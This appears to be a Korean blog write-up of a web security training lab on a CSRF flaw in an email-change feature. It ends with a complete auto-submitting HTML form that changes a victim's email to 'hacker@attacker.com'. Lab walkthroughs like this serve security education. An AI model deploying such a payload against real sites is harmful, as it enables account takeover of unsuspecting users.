web security academy 37

2026. 4. 20. 20:59보안/Web security Academy

Lab: CSRF vulnerability with no defenses

This lab's email change functionality is vulnerable to CSRF.

To solve the lab, craft some HTML that uses a CSRF attack to change the viewer's email address and upload it to your exploit server.

You can log in to your own account using the following credentials: wiener:peter

( 이 연구소의 이메일 변경 기능은 CSRF에 취약합니다.

실험실을 해결하려면 CSRF 공격을 사용하여 시청자의 이메일 주소를 변경하고 익스플로잇 서버에 업로드하는 HTML을 작성하세요.

다음 자격 증명을 사용하여 자신의 계정에 로그인할 수 있습니다: wiener:peter )

 

1. 웹 페이지 서버에 html 코드를 작성하여 CSRF 취약점으로 이메일을 변경하는 작업입니다

 

이전에 했던 코드를 그대로 사용하니 되지가 않았습니다(뭐 그렇겠죠..

방식 AJAX + 토큰 추출 단순 form 제출
SOP 영향 ❌ 막힘 ✅ 영향 없음
토큰 필요 필요함 (시도함) 필요 없음
결과 실패 성공

 

이런 차이가 있다고 합니다..

 

그러면 다른 방식으로 문제를 풀어야하는데 일단 html코드를 사용하여 my-account를 사용을 해야할것같습니다 wiener에 접속하여 이메일 변경을 하니

post 방식으로 my-account/change-email까지 들어간것을 확인했습니다 그러면 이러한 방식으로 공격할 웹 사이트를 지정할 수 있을것같습니다 

그러면 지정한 웹 사이트에 들어갈 데이터를 넣어주고 이를 보내면 될것같습니다 

 

<html>
  <body>
    <form action="https://[YOUR-LAB-ID].web-security-academy.net/my-account/change-email" method="POST" id="csrf-form">
      <input type="hidden" name="email" value="hacker@attacker.com" />
    </form>

    <script>
      document.getElementById('csrf-form').submit();
    </script>
  </body>
</html>

 

이상입니다

 

감사합니다

'보안 > Web security Academy' 카테고리의 다른 글

web security academy 38  (0) 2026.04.23
web security academy 36  (0) 2026.04.13
web security academy 35  (0) 2026.04.12
web security academy 34  (1) 2026.04.07
web security academy 33  (0) 2026.04.02